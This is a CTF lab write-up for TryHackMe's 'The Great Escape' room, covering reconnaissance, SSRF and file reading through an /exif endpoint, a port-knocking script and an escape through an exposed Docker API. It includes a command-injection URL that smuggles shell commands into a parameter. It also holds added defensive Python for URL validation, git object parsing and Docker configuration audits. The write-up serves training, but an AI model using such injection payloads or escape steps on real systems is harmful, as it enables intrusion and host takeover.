# TryHackMe - The Great Escape

## NMAP

```
nmap -sC -sV 10.10.108.159
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-15 16:17 PKT
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 16:21 (0:02:05 remaining)
Stats: 0:02:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 16:22 (0:02:10 remaining)
Nmap scan report for 10.10.108.159
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh?
| fingerprint-strings:
|   GenericLines:
|_    uT9UNaD!^xFWU'tGL'-@"d2gE"Xd
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.19.6
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.80%I=7%D=2/15%Time=602A5867%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,1F,"uT9UNaD!\^xFWU'tGL\\'-@\"d2gE\"Xd\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.11 seconds
```

## PORT 80 (HTTP)

From the nmap scan we see 3 disallowed entries in `robots.txt`.

The first entry, `/api/`, returns a 503, the status a server sends when it is temporarily unable to handle the request because of overloading or maintenance.
The second entry involves uploading an image file. As for the third, I didn't know how to access `/*.bak.txt$`.

## Dirsearch

For fuzzing I used dirsearch, but I was getting a lot of 503 status codes. I did see `/api/`, which returned a 301 with a length of `169` bytes. I also ran `nikto`, and it found some cert and archive files, but they were also returning 503 errors. So there is some WAF (Web Application Firewall) in place that we need to bypass, and automated tools may not work here.

For the web flag I looked at the hint, which mentioned a "well-known file". I thought about `robots.txt` and the JavaScript file, but that was a dead end, so I started guessing and eventually got there. It says to make a request with `HEAD`.

Going back to `robots.txt`, I tried to combine two disallowed entries and got somewhere. If we focus on this part, we can see that it's pointing at `/exif` and has a parameter `url`.

We can do LFI now. Since it's a docker container (you can tell, as there aren't any usernames) we'll go directly to the `/root/` directory. Reading `dev-note.txt`, we get the password, but I'm not sure if it's for hydra.
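The `/exif` endpoint takes a `url` parameter and fetches it server-side, which is what turns it into a file-read primitive here (and, further on in the room, into command execution through the internal `api-dev-backup` service). As an added example that is not the room's code, the Python below puts the vulnerable handler shape next to a hardened one. The `exiftool` tool name, the handler functions and the size limit are assumptions made for the illustration.

```python
"""Added example, not the room's code.

Two defects stack up in a `/exif?url=` style endpoint: the service fetches
any URL it is given (SSRF into internal hosts) and the backend splices that
URL into a shell command line (command injection). The `exiftool` tool name
and the handler shape are assumptions used to show the fix.
"""
import ipaddress
import subprocess
import tempfile
import urllib.request
from typing import List
from urllib.parse import urlsplit

MAX_IMAGE_BYTES = 10 * 1024 * 1024   # assumed upper bound for an image download


# --- vulnerable pattern ------------------------------------------------------
def build_command_unsafe(url: str) -> str:
    # If this string is run with shell=True, every shell metacharacter in `url`
    # (';', '|', '$(...)') is interpreted by the shell, not by exiftool.
    return "exiftool " + url


# --- hardened pattern --------------------------------------------------------
class BadURL(ValueError):
    """Raised for any URL the service refuses to fetch."""


def is_public_host(host: str) -> bool:
    """Heuristic pre-check on the URL's host.

    This runs offline and does not resolve names. A real service must also
    resolve the name, apply the same rule to every returned address, and
    connect to that pinned address; otherwise DNS rebinding bypasses the check.
    """
    try:
        return ipaddress.ip_address(host).is_global   # rejects 10/8, 127/8, 169.254/16, ::1, ...
    except ValueError:
        pass
    lowered = host.lower()
    # single-label names such as `api-dev-backup` only resolve on the container
    # network; they are never a legitimate public image host
    if "." not in lowered:
        return False
    return not lowered.endswith((".local", ".internal", ".localhost"))


def validate_url(url: str) -> str:
    """Return `url` unchanged if it points at a public http(s) host on a standard port."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise BadURL("scheme must be http or https")       # blocks file://, gopher://, ...
    if not parts.hostname or not is_public_host(parts.hostname):
        raise BadURL("host is internal or not allowed")
    if parts.port not in (None, 80, 443):
        raise BadURL("non-standard port")                  # blocks :8080-style reach into backends
    if any(ch in url for ch in " ;|&`$\r\n\0"):
        raise BadURL("unexpected characters")              # defence in depth; argv below never hits a shell
    return url


def is_allowed(url: str) -> bool:
    """Boolean wrapper around validate_url (malformed ports raise ValueError too)."""
    try:
        validate_url(url)
        return True
    except ValueError:
        return False


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # a 3xx pointing at an internal address would re-open the SSRF, so never follow
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_limited(url: str, max_bytes: int = MAX_IMAGE_BYTES) -> bytes:
    """Download at most max_bytes from an already validated URL, no redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    with opener.open(url, timeout=5) as resp:
        data = resp.read(max_bytes + 1)
    if len(data) > max_bytes:
        raise BadURL("response too large")
    return data


def build_command_safe(path: str) -> List[str]:
    # argument list, so no shell is involved, and the tool sees a local path, never the URL
    return ["exiftool", "-j", "--", path]


def extract_metadata(url: str) -> str:
    """Validate, fetch into a temp file, then run the tool on that file only."""
    data = fetch_limited(validate_url(url))
    with tempfile.NamedTemporaryFile(suffix=".img") as tmp:
        tmp.write(data)
        tmp.flush()
        proc = subprocess.run(build_command_safe(tmp.name), capture_output=True, text=True, timeout=10)
    return proc.stdout
```

Both layers need the fix: validating the host at the public gateway stops requests from reaching `api-dev-backup`, and passing an argument list (never a shell string) at the backend stops `;`-separated commands even if an internal caller is trusted. The host check alone is only a heuristic until the resolved address is checked and pinned as well.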
Visiting the `/root/.git/` folder, I used this command to search for files:

```
http://10.10.176.126/api/exif?url=http://api-dev-backup:8080/exif?url=;cd%20/root/.git/;pwd;ls%20-la%20objects
```

And found objects which could be recovered using `git show`:

```
a3d30a7d0510dc6565ff9316e3fb84434916dee8
3f5e51190a2c8e2a4ea226e7c004ff656148a168
4530ff7f56b215fa9fe76c4d7cc1319960c4e539
4b825dc642cb6eb9a060e54bf8d69288fbee4904
5242825dfd6b96819f65d17a1c31a99fea4ffb6a
89dcd015496baca7521df9a07de050c37cb3d4ba
aae81292b0aeb73d28ce77dd3078470897151cd8
efadf5b5aa6d0b3bd434c0437be8559edef2a52e
fc326ab9338571dfeb64c00f4b9d85c09d557828
```

These were the objects I gathered by going back and forth. We get a flag, but it was invalid; we also got some ports to knock. So I did a simple port knock through a tool we can install: https://www.howtogeek.com/442733/how-to-use-port-knocking-on-linux-and-why-you-shouldnt/

But this method failed, so I looked for scripts on GitHub, found one and modified it a little to add some more arguments for ports:

```
#!/usr/bin/python
# Python 2 port-knock script: tries every ordering of the five ports given on
# the command line and knocks them in that order.
import sys
from socket import *
from itertools import permutations

# host plus exactly five ports are required (argv[1] .. argv[6])
if len(sys.argv) != 7:
    print "---------------------------------------------"
    print " Port Knocker "
    print "Usage: python knock.py <host> <port1> <port2> <port3> <port4> <port5>"
    print "Ex: python knock.py 192.168.209.130 1 2 3 4 5"
    print "---------------------------------------------"
    sys.exit(0)

host = sys.argv[1]
ports = permutations([int(p) for p in sys.argv[2:7]])

def Knockports(ports):
    # attempt a TCP connection to each port in sequence; connect_ex returns an
    # error code instead of raising, so a closed port still counts as a knock
    for port in ports:
        try:
            s = socket(AF_INET, SOCK_STREAM)
            s.settimeout(0.1)
            s.connect_ex((host, port))
            s.close()
            print "Knocked on port " + str(port)
        except Exception, e:
            print "Error: " + str(e)

for combination in list(ports):
    print "Testing permutation: " + str(combination)
    Knockports(combination)
```

Then I ran the python2 script. Doing an nmap scan, we can see that the docker port is open now.

After that I visited HackTricks and tried to run some commands, but wasn't able to do anything and kept failing. This blog saved me from quitting on this room: https://www.hackingarticles.in/docker-for-pentester-abusing-docker-api/

First I tried to view the images, then tried connecting to them, but since they were not running I used `ps -a` to see which images were running, and saw that container ID `49fe455a9681` was running, so I was able to connect to it. But this container didn't have any interesting stuff, so I connected to another one, which was running on port 8080 of that image. Then I switched to another container.

Gathering the objects from before, I used `git cat-file -p`. This was the second flag.

Now I tried to look for docker breakouts, exploits and capabilities, but nothing seemed to work, and I was getting the feeling that this was a huge rabbit hole. So going back to the docker images, I saw alpine at the bottom and gave it a shot by mounting it.

This box was a lot more difficult, because there was a prize for it: those who completed it within 3 days would be added to the raffle. I completed this box after 2 days, so hopefully I'll win a prize. With that we have all the flags.
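The hashes listed under `/root/.git/objects` above are loose objects, and `git show` / `git cat-file -p` simply decompress them and strip a header. The following is an added example, not part of the writeup, that does the same thing without calling git: it builds a constructed blob and tree in memory, hashes them the way git does, and decodes them back. The file name `note.txt` and the content are constructed; the object ids are whatever git would compute for that content.

```python
"""Added example, not part of the writeup.

An in-memory dict stands in for the `.git/objects` directory. The point is
that anyone who can read those files can recover every committed file, which
is why a readable `.git` directory is a leak on its own.
"""
import hashlib
import zlib
from typing import Dict, List, Tuple


def hash_object(obj_type: str, content: bytes) -> Tuple[str, bytes]:
    """Object id and on-disk bytes exactly as git computes them:
    id = sha1("<type> <size>\\0" + content); file = zlib(that same byte string)."""
    raw = f"{obj_type} {len(content)}\0".encode() + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def object_path(oid: str) -> str:
    # loose objects live at .git/objects/<2 hex>/<38 hex>
    return f".git/objects/{oid[:2]}/{oid[2:]}"


def parse_loose_object(data: bytes) -> Tuple[str, bytes]:
    """Inverse of hash_object: what `git cat-file` does after reading the file."""
    raw = zlib.decompress(data)
    header, sep, content = raw.partition(b"\0")
    if not sep:
        raise ValueError("missing header terminator")
    obj_type, size = header.decode("ascii").split(" ")
    if int(size) != len(content):
        raise ValueError("size mismatch: truncated or corrupt object")
    return obj_type, content


def parse_tree(content: bytes) -> List[Tuple[str, str, str]]:
    """Tree entries are '<mode> <name>\\0<20 raw sha1 bytes>', back to back."""
    entries = []
    pos = 0
    while pos < len(content):
        nul = content.index(b"\0", pos)
        mode, name = content[pos:nul].decode("utf-8").split(" ", 1)
        entries.append((mode, name, content[nul + 1:nul + 21].hex()))
        pos = nul + 21
    return entries


def cat_file_p(store: Dict[str, bytes], oid: str) -> str:
    """Pretty-print like `git cat-file -p <oid>`: blobs verbatim, trees as a listing."""
    obj_type, content = parse_loose_object(store[oid])
    if obj_type == "tree":
        return "\n".join(
            f"{mode} {'tree' if mode == '40000' else 'blob'} {entry_oid}\t{name}"
            for mode, name, entry_oid in parse_tree(content)
        )
    # blobs, commits and tags are plain text as far as printing goes
    return content.decode("utf-8", errors="replace")


def build_demo_store() -> Tuple[Dict[str, bytes], str, str]:
    """Constructed repository: one blob and one tree that references it."""
    store: Dict[str, bytes] = {}
    blob_id, blob_bytes = hash_object("blob", b"hello world\n")
    store[blob_id] = blob_bytes
    tree_content = b"100644 note.txt\0" + bytes.fromhex(blob_id)
    tree_id, tree_bytes = hash_object("tree", tree_content)
    store[tree_id] = tree_bytes
    return store, blob_id, tree_id


if __name__ == "__main__":
    store, blob_id, tree_id = build_demo_store()
    for oid in (tree_id, blob_id):
        print(object_path(oid))
        print(cat_file_p(store, oid))
```

Walking a tree's entries and calling `cat_file_p` on each blob id reproduces a whole snapshot of the working directory, which is the recovery the writeup performs one object at a time.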
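The final step works because the Docker daemon was reachable over the network and a new container could be started with the host's filesystem mounted into it. From the defender's side, the conditions that make this possible can be read straight out of `docker inspect` and `daemon.json`. The audit below is an added example, not part of the writeup; its two container records and the daemon config are constructed to follow the shape of those formats and are not taken from the room.

```python
"""Added example, not part of the writeup.

Flags the daemon and container settings that turn "I can talk to the Docker
API" into "I own the host": an unauthenticated TCP listener, privileged
containers, host namespaces, risky capabilities, and bind mounts of
sensitive host paths (including `/` itself, which is the escape used above).
"""
import json
from typing import List

# host paths that hand a container a foothold on the host when bind-mounted
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock")
# capabilities that are effectively root-on-host when granted
RISKY_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH", "NET_ADMIN", "BPF"}


def _sensitive(path: str) -> bool:
    path = path.rstrip("/") or "/"
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS[1:])


def audit_daemon(config: dict) -> List[str]:
    """daemon.json: a tcp:// listener without tlsverify is an unauthenticated root API."""
    findings = []
    for host in config.get("hosts", []):
        if host.startswith("tcp://") and not config.get("tlsverify"):
            findings.append(f"daemon: {host} exposes the API over TCP without client certificates")
    return findings


def audit_container(c: dict) -> List[str]:
    """One `docker inspect` record in, a list of human-readable findings out."""
    name = c.get("Name", "?").lstrip("/")
    hc = c.get("HostConfig", {})
    findings = []
    if hc.get("Privileged"):
        findings.append(f"{name}: Privileged=true (all capabilities, all devices)")
    if hc.get("PidMode") == "host":
        findings.append(f"{name}: PidMode=host (can see and ptrace host processes)")
    if hc.get("NetworkMode") == "host":
        findings.append(f"{name}: NetworkMode=host")
    for cap in hc.get("CapAdd") or []:
        cap = cap.upper()
        cap = cap[4:] if cap.startswith("CAP_") else cap
        if cap in RISKY_CAPS or cap == "ALL":
            findings.append(f"{name}: CapAdd {cap}")
    # bind mounts appear both as HostConfig.Binds ("src:dst[:opts]") and as Mounts entries
    sources = [b.split(":")[0] for b in hc.get("Binds") or []]
    sources += [m.get("Source", "") for m in c.get("Mounts", []) if m.get("Type") == "bind"]
    for src in dict.fromkeys(sources):   # de-duplicate, keep order
        if _sensitive(src):
            findings.append(f"{name}: host path {src} bind-mounted into the container")
    return findings


def audit(inspect_json: str, daemon_json: str) -> List[str]:
    findings = audit_daemon(json.loads(daemon_json))
    for container in json.loads(inspect_json):
        findings.extend(audit_container(container))
    return findings


# constructed sample input (shape of `docker inspect` output and daemon.json; values invented)
DEMO_INSPECT = json.dumps([
    {"Name": "/web",
     "HostConfig": {"Privileged": False, "Binds": ["/srv/web/data:/data:ro"]},
     "Mounts": [{"Type": "bind", "Source": "/srv/web/data", "Destination": "/data"}]},
    {"Name": "/escape",
     "HostConfig": {"Privileged": True, "Binds": ["/:/mnt/host"], "CapAdd": ["SYS_ADMIN"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt/host"}]},
])
# 2375 is the conventional plaintext Docker API port; no tlsverify means no client auth
DEMO_DAEMON = json.dumps({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})

if __name__ == "__main__":
    for line in audit(DEMO_INSPECT, DEMO_DAEMON):
        print(line)
```

Run against real output (`docker inspect $(docker ps -aq)` and `/etc/docker/daemon.json`), the same functions apply unchanged. The daemon finding is the one that matters most: once the API is reachable without client certificates, every container-level control can be bypassed by starting a new container with whatever mounts the caller wants.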